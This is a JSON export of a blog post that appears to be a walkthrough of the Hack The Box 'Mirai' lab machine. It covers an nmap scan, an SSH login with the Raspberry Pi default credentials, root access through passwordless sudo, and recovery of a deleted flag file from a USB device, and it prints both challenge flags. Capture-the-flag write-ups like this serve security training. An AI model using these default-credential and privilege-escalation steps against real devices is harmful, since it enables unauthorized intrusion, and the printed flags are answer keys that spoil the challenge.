{"id":3731,"date":"2020-08-15T19:42:17","date_gmt":"2020-08-15T10:42:17","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3731"},"modified":"2020-08-30T23:33:40","modified_gmt":"2020-08-30T14:33:40","slug":"hack-the-box-mirai-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3731","title":{"rendered":"Hack The Box &#8211; Mirai &#8211; Walkthrough"},"content":{"rendered":"<h3>Port 80 is accessible<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 mirai.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-15 07:33 UTC\r\nNmap scan report for mirai.htb (10.10.10.48)\r\nHost is up (0.047s latency).\r\nNot shown: 80 filtered ports\r\nPORT      STATE  SERVICE         VERSION\r\n22\/tcp    open   ssh             OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)\r\n| ssh-hostkey:\r\n|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)\r\n|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)\r\n|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)\r\n|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)\r\n23\/tcp    closed telnet\r\n25\/tcp    closed smtp\r\n53\/tcp    open   domain          dnsmasq 2.76\r\n| dns-nsid:\r\n|_  bind.version: dnsmasq-2.76\r\n80\/tcp    open   http            lighttpd 1.4.35\r\n|_http-server-header: lighttpd\/1.4.35\r\n|_http-title: Website Blocked\r\n111\/tcp   closed rpcbind\r\n113\/tcp   closed ident\r\n443\/tcp   closed https\r\n445\/tcp   closed microsoft-ds\r\n993\/tcp   closed imaps\r\n995\/tcp   closed pop3s\r\n1025\/tcp  closed NFS-or-IIS\r\n3986\/tcp  closed mapper-ws_ethd\r\n5060\/tcp  closed sip\r\n5631\/tcp  closed pcanywheredata\r\n8009\/tcp  closed ajp13\r\n8081\/tcp  closed blackice-icecap\r\n8888\/tcp  closed sun-answerbook\r\n32768\/tcp closed filenet-tms\r\n49152\/tcp closed unknown\r\nOS fingerprint not ideal because: Timing level 5 (Insane) used\r\nNo OS 
matches for host\r\nNetwork Distance: 2 hops\r\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\r\n<\/pre>\n<h3>Try logging in as the Raspberry Pi default user<\/h3>\n<p><a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-15_174128.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-15_174128-300x93.png\" alt=\"\" width=\"300\" height=\"93\" class=\"alignnone size-medium wp-image-3732\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-15_174128-300x93.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-15_174128-1024x318.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-15_174128-768x239.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-15_174128-1536x477.png 1536w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-15_174128.png 1918w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\nPi-hole v3.1.4 is running. It appears to be a program that runs a DNS server that blocks ads.<br \/>\nIt also seems to be commonly set up on a Raspberry Pi. I was able to SSH in with the default ID.<br \/>\nusername:pi<br \/>\npassword:raspberry<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# ssh pi@mirai.htb\r\nThe authenticity of host 'mirai.htb (10.10.10.48)' can't be established.\r\nECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY\/cVIx\/oXtiqLPXiXMY.\r\nAre you sure you want to continue connecting (yes\/no\/&#x5B;fingerprint])? 
yes\r\nWarning: Permanently added 'mirai.htb,10.10.10.48' (ECDSA) to the list of known hosts.\r\npi@mirai.htb's password:\r\nPermission denied, please try again.\r\npi@mirai.htb's password:\r\n\r\nThe programs included with the Debian GNU\/Linux system are free software;\r\nthe exact distribution terms for each program are described in the\r\nindividual files in \/usr\/share\/doc\/*\/copyright.\r\n\r\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\r\npermitted by applicable law.\r\nLast login: Sun Aug 27 14:47:50 2017 from localhost\r\n\r\nSSH is enabled and the default password for the 'pi' user has not been changed.\r\nThis is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.\r\n\r\npi@raspberrypi:~ $ sudo -l\r\nMatching Defaults entries for pi on localhost:\r\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\r\n\r\nUser pi may run the following commands on localhost:\r\n    (ALL : ALL) ALL\r\n    (ALL) NOPASSWD: ALL\r\n\r\npi@raspberrypi:~ $ sudo su\r\n\r\n# cat Desktop\/user.txt\r\nff837707441b257a20e32199d7c8838d\r\n<\/pre>\n<h2>Check root.txt<\/h2>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# cat \/root\/root.txt\r\nI lost my original root.txt! 
I think I may have a backup on my USB stick...\r\n\r\n# df -h\r\nFilesystem      Size  Used Avail Use% Mounted on\r\naufs            8.5G  2.8G  5.3G  34% \/\r\ntmpfs           100M  4.8M   96M   5% \/run\r\n\/dev\/sda1       1.3G  1.3G     0 100% \/lib\/live\/mount\/persistence\/sda1\r\n\/dev\/loop0      1.3G  1.3G     0 100% \/lib\/live\/mount\/rootfs\/filesystem.squashfs\r\ntmpfs           250M     0  250M   0% \/lib\/live\/mount\/overlay\r\n\/dev\/sda2       8.5G  2.8G  5.3G  34% \/lib\/live\/mount\/persistence\/sda2\r\ndevtmpfs         10M     0   10M   0% \/dev\r\ntmpfs           250M  8.0K  250M   1% \/dev\/shm\r\ntmpfs           5.0M  4.0K  5.0M   1% \/run\/lock\r\ntmpfs           250M     0  250M   0% \/sys\/fs\/cgroup\r\ntmpfs           250M  8.0K  250M   1% \/tmp\r\n\/dev\/sdb        8.7M   93K  7.9M   2% \/media\/usbstick\r\ntmpfs            50M     0   50M   0% \/run\/user\/999\r\ntmpfs            50M     0   50M   0% \/run\/user\/1000\r\n\r\n# cat \/media\/usbstick\/damnit.txt\r\nDamnit! Sorry man I accidentally deleted your files off the USB stick.\r\nDo you know if there is any way to get them back?\r\n\r\n-James\r\n\r\n# strings \/dev\/sdb\r\n&gt;r &amp;\r\n\/media\/usbstick\r\nlost+found\r\nroot.txt\r\ndamnit.txt\r\n&gt;r &amp;\r\n&gt;r &amp;\r\n\/media\/usbstick\r\nlost+found\r\nroot.txt\r\ndamnit.txt\r\n&gt;r &amp;\r\n\/media\/usbstick\r\n2]8^\r\nlost+found\r\nroot.txt\r\ndamnit.txt\r\n&gt;r &amp;\r\n3d3e483143ff12ec505d026fa13e020b\r\nDamnit! 
Sorry man I accidentally deleted your files off the USB stick.\r\nDo you know if there is any way to get them back?\r\n-James\r\n\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Port 80 is accessible # nmap -A -n -F -T5 mirai.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-15 07:33 UTC Nm [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3731"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3731"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3731\/revisions"}],"predecessor-version":[{"id":3785,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3731\/revisions\/3785"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3731"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3731"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3731"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}